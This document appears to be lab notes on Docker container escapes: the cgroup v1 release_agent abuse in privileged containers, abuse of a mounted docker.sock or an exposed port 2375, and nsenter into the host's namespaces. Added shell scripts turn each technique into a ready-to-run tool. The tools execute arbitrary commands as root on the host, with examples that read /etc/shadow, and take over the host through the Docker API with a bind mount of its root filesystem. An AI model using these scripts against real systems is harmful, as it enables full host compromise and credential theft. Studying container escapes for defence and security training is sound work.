Privileged mode

In privileged mode (docker run --privileged) the container keeps every capability and gets unrestricted access to host devices, so it can interact with the host kernel almost like a process running on the host itself: mount filesystems, load modules, talk to /dev.

capsh --print lists the capabilities the container currently holds.

For example:

capsh --print 
Current: = cap_chown, cap_sys_module, cap_sys_chroot, cap_sys_admin, cap_setgid,cap_setuid

cap_sys_admin is the one that matters for the PoC below: it is what allows mount(2) inside the container. PoC (the cgroup v1 release_agent escape; it needs cap_sys_admin and a host that still uses cgroup v1, because cgroup v2 has no release_agent):

# mount a fresh cgroup v1 hierarchy (the rdma controller is almost never in use) and create a child cgroup
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# ask the kernel to run release_agent when the child cgroup becomes empty
echo 1 > /tmp/cgrp/x/notify_on_release
# host-side path of this container's overlay upperdir: files we create are visible there on the host
host_path=`sed -n 's/.*upperdir=\([^,]*\).*/\1/p' /etc/mtab`
# release_agent must be a path that is valid on the HOST, so point it at our script through the upperdir
echo "$host_path/exploit" > /tmp/cgrp/release_agent

# the script the host kernel will execute as root, outside the container
echo '#!/bin/sh' > /exploit
echo "cat /home/cmnatic/flag.txt > $host_path/flag.txt" >> /exploit

chmod a+x /exploit
# put a short-lived shell into the cgroup; when it exits the cgroup is empty and release_agent fires
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# the result then appears as /flag.txt inside the container
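As an added example, not part of the original page: a precondition check and wrapper around the PoC above. It confirms from capsh --print output that cap_sys_admin is present, that the host is still on cgroup v1, picks a controller that can be mounted (rdma, then memory), and derives the host path of the container's overlay upperdir from the mtab entry for / more explicitly than the one-line sed above. The helper names, the overlay2 storage-driver assumption and the reuse of /tmp/cgrp are mine.

```shell
#!/bin/sh
# Added example, not part of the original page. Assumptions: cgroup v1 host,
# overlay2 storage driver, cap_sys_admin in the container; helper names are mine.

# True when capability $1 (e.g. cap_sys_admin) is in the "Current:" line of the
# capsh --print output passed as $2. Handles both "Current: = a,b+ep" and
# "Current: a,b=ep" layouts.
has_cap() {
    printf '%s\n' "$2" | sed -n 's/^Current:[ =]*//p' | sed 's/[+=][eip]*$//' \
        | tr ',' '\n' | tr -d ' ' | grep -qx "$1"
}

# cgroup v2 (unified hierarchy) has no release_agent, so the technique does not apply.
is_cgroup_v2() {
    [ -f /sys/fs/cgroup/cgroup.controllers ]
}

# Pick a cgroup v1 controller to mount from /proc/cgroups text ($1): rdma first
# (almost never in use, so the new hierarchy is ours), memory as a fallback.
pick_cgroup_controller() {
    for c in rdma memory; do
        if printf '%s\n' "$1" | awk -v c="$c" '$1 == c && $4 == 1 { ok = 1 } END { exit !ok }'; then
            echo "$c"
            return 0
        fi
    done
    return 1
}

# Host-side path of the container's writable layer, taken from the overlay entry for /
# in mtab-style text ($1). Files written in the container appear there on the host.
upperdir_from_mtab() {
    printf '%s\n' "$1" | sed -n 's/^overlay \/ overlay .*upperdir=\([^,]*\).*/\1/p' | head -n 1
}

# Run command $1 as root on the host via release_agent; its output lands in /output
# inside the container (= $host_path/output on the host).
run_escape() {
    if ! has_cap cap_sys_admin "$(capsh --print)"; then
        echo "cap_sys_admin not reported by capsh (or capsh missing); cannot mount cgroupfs" >&2; return 1
    fi
    if is_cgroup_v2; then
        echo "cgroup v2 host: no release_agent, technique does not apply" >&2; return 1
    fi
    ctrl="$(pick_cgroup_controller "$(cat /proc/cgroups)")" || { echo "no mountable controller" >&2; return 1; }
    host_path="$(upperdir_from_mtab "$(cat /etc/mtab)")"
    [ -n "$host_path" ] || { echo "root is not overlay-backed; cannot derive host path" >&2; return 1; }

    mkdir -p /tmp/cgrp
    grep -q ' /tmp/cgrp ' /proc/mounts || mount -t cgroup -o "$ctrl" cgroup /tmp/cgrp
    mkdir -p /tmp/cgrp/x
    echo 1 > /tmp/cgrp/x/notify_on_release              # run release_agent when x empties
    echo "$host_path/exploit" > /tmp/cgrp/release_agent  # path as the HOST kernel sees it
    printf '#!/bin/sh\nexec > %s/output 2>&1\n%s\n' "$host_path" "$1" > /exploit
    chmod a+x /exploit
    sh -c 'echo $$ > /tmp/cgrp/x/cgroup.procs'           # short-lived member; its exit empties x
    sleep 1
    cat /output
}

if [ "${1:-}" = run ]; then
    run_escape "${2:-id; hostname}"
fi
```

Run it as `sh escape.sh run 'cat /etc/shadow'` inside the privileged container; the command is executed by the host kernel in the host's mount namespace, which is why the script path and the output path both have to be expressed through the upperdir.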

Unix Sockets 101

The docker client has to be present in the container (or something else that can speak HTTP over a Unix socket, such as curl --unix-socket); look for the daemon socket, which is normally mounted at /var/run/docker.sock.
Then:
docker run -v /:/mnt --rm -it alpine chroot /mnt sh gives a root shell on the host: the host's / is bind-mounted at /mnt in a new container and chroot switches into it.

The Docker Engine - TCP Sockets Edition

TCP sockets

Did one of these a few days ago, the one with port 2375:

# curl http://10.10.77.104:2375/version
{"Platform":{"Name":"Docker Engine - Community"},"Components":[{"Name":"Engine","Version":"20.10.20","Details":{"ApiVersion":"1.41","Arch":"amd64","BuildTime":"2022-10-18T18:18:12.000000000+00:00","Experimental":"false","GitCommit":"03df974","GoVersion":"go1.18.7","KernelVersion":"5.15.0-1022-aws","MinAPIVersion":"1.12","Os":"linux"}},{"Name":"containerd","Version":"1.6.8","Details":{"GitCommit":"9cd3357b7fd7218e4aec3eae239db1f68a5a6ec6"}},{"Name":"runc","Version":"1.1.4","Details":{"GitCommit":"v1.1.4-0-g5fd4c4d"}},{"Name":"docker-init","Version":"0.19.0","Details":{"GitCommit":"de40ad0"}}],"Version":"20.10.20","ApiVersion":"1.41","MinAPIVersion":"1.12","GitCommit":"03df974","GoVersion":"go1.18.7","Os":"linux","Arch":"amd64","KernelVersion":"5.15.0-1022-aws","BuildTime":"2022-10-18T18:18:12.000000000+00:00"}

docker -H tcp://10.10.77.104:2375 ps

With -H pointing at the exposed daemon, the docker client behaves exactly as if it were running on that host, so the same docker run -v /:/mnt --rm -it alpine chroot /mnt sh gives a shell on it. Port 2375 is unauthenticated plain HTTP (2376 is the TLS variant), so anything that can reach it gets root on the Docker host.
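As an added example covering both the Unix-socket and the TCP section, not part of the original page: the same escape driven through the Docker Engine API with curl, so the docker CLI does not have to exist inside the container. The endpoint is either the mounted socket or the plain-HTTP port shown above. Helper names are mine; the image is assumed to exist on the host already.

```shell
#!/bin/sh
# Added example, not part of the original page. Drives the Docker Engine API with curl
# so the docker CLI does not have to exist in the container. Works over the mounted
# Unix socket and over a plain-HTTP TCP port alike. Helper names are mine.

# Build the URL for API path $2 on endpoint $1 (unix:///path or tcp://host:port).
api_url_for() {
    case "$1" in
        unix://*) printf 'http://localhost%s' "$2" ;;
        tcp://*)  printf 'http://%s%s' "${1#tcp://}" "$2" ;;
        *)        return 1 ;;
    esac
}

# curl wrapper: dapi ENDPOINT PATH [extra curl arguments]
dapi() {
    ep="$1"; path="$2"; shift 2
    url="$(api_url_for "$ep" "$path")" || { echo "unsupported endpoint: $ep" >&2; return 1; }
    case "$ep" in
        unix://*) curl -s --unix-socket "${ep#unix://}" "$@" "$url" ;;
        *)        curl -s "$@" "$url" ;;
    esac
}

# JSON for POST /containers/create: bind the host's / at /host and run $2 inside it
# as root. Tty=true makes /logs return a raw stream instead of the multiplexed format.
create_body() {
    esc="$(printf '%s' "$2" | sed 's/\\/\\\\/g; s/"/\\"/g')"
    printf '{"Image":"%s","Cmd":["chroot","/host","sh","-c","%s"],"Tty":true,"HostConfig":{"Binds":["/:/host"]}}' "$1" "$esc"
}

# Pull the container id out of the create response without jq.
id_from_create() {
    printf '%s\n' "$1" | sed -n 's/.*"Id":"\([0-9a-f]*\)".*/\1/p'
}

# Create, start, wait for exit, print the output, remove. The image must already be
# present on the host (GET /images/json lists candidates); /containers/create does not pull.
api_escape() {
    ep="$1"; image="$2"; cmd="$3"
    resp="$(dapi "$ep" /containers/create -X POST -H 'Content-Type: application/json' \
        -d "$(create_body "$image" "$cmd")")" || return 1
    id="$(id_from_create "$resp")"
    [ -n "$id" ] || { echo "create failed: $resp" >&2; return 1; }
    dapi "$ep" "/containers/$id/start" -X POST
    dapi "$ep" "/containers/$id/wait" -X POST >/dev/null
    dapi "$ep" "/containers/$id/logs?stdout=1&stderr=1"
    dapi "$ep" "/containers/$id" -X DELETE
}

if [ "${1:-}" = run ]; then
    # e.g.  sh api_escape.sh run unix:///var/run/docker.sock alpine 'id; hostname'
    #       sh api_escape.sh run tcp://10.10.77.104:2375 alpine 'cat /etc/shadow'
    api_escape "$2" "${3:-alpine}" "${4:-id}"
fi
```

Because the API is used directly, the version probe from the page is just `dapi tcp://10.10.77.104:2375 /version`, and the whole escape is four requests: create with a Binds entry for /, start, wait, logs.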

Namespaces

nsenter --target 1 --mount --uts --ipc --net /bin/bash

--target 1 selects PID 1 as the process whose namespaces we enter, and the command given at the end (/bin/bash) is then executed inside them. PID 1 is the host's init (/sbin/init or systemd), so the shell ends up as root in the host's namespaces.
This only works when PID 1 as seen from the container really is the host's init, i.e. the container shares the host PID namespace (--pid=host), and when the container holds cap_sys_admin, which setns() requires; a privileged container has it.

--mount enters the target's mount namespace, so the shell sees the host's filesystem tree. From the nsenter man page: "If no file is specified, enter the mount namespace of the target process."

--uts enters the target's UTS namespace, so the shell carries the host's hostname and domain name rather than the container's.

--ipc enters the target's inter-process communication namespace: the host's System V IPC objects and POSIX message queues become visible, which is what lets us read shared memory used by host processes.

--net enters the target's network namespace, so the shell uses the host's interfaces, routes and sockets; from there we can bind ports or open new connections as the host.
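As an added example, not part of the original page: checks to run before (and after) the nsenter line, to confirm that PID 1 is really the host's init and to see which namespaces the shell already shares with it. /proc/PID/ns/* links carry the namespace identity, so comparing them against /proc/self/ns/* shows whether a switch actually happened. Helper names and the init-name heuristic are mine.

```shell
#!/bin/sh
# Added example, not part of the original page. Helper names are hypothetical.

# Namespace identity of a process, e.g. "mnt:[4026531840]". Empty if /proc/$1/ns is not
# readable (different user without cap_sys_ptrace, or no /proc).
ns_id() {
    readlink "/proc/$1/ns/$2" 2>/dev/null
}

# True when process $1 and this shell share namespace type $2.
same_ns() {
    [ -n "$(ns_id "$1" "$2")" ] && [ "$(ns_id "$1" "$2")" = "$(ns_id self "$2")" ]
}

# Heuristic on argv[0] of PID 1: the host's init is systemd or /sbin/init, while a
# container's PID 1 is usually the image entrypoint (sh, bash, nginx, ...).
looks_like_host_init() {
    case "$1" in
        /sbin/init|/usr/lib/systemd/systemd|/lib/systemd/systemd|systemd|init) return 0 ;;
        *) return 1 ;;
    esac
}

# Report what "--target 1" would enter and which namespaces are already shared.
check_target_pid1() {
    argv0="$(tr '\000' '\n' < /proc/1/cmdline 2>/dev/null | head -n 1)"
    if looks_like_host_init "$argv0"; then
        echo "PID 1 is $argv0: this container sees the host PID namespace"
    else
        echo "PID 1 is '$argv0': probably the container's own entrypoint; nsenter --target 1 stays inside the container"
    fi
    for ns in mnt uts ipc net pid; do
        if same_ns 1 "$ns"; then
            echo "$ns: already shared with PID 1"
        else
            echo "$ns: differs from PID 1 ($(ns_id 1 "$ns"))"
        fi
    done
}

if [ "${1:-}" = enter ]; then
    check_target_pid1
    # the command from the page; run the checks again from the new shell to see mnt/uts/ipc/net flip to "shared"
    exec nsenter --target 1 --mount --uts --ipc --net /bin/bash
fi
```

If the first line of the report names the container's entrypoint instead of init, the container is in its own PID namespace and --target 1 buys nothing; look for another host process visible in /proc, or another escape path.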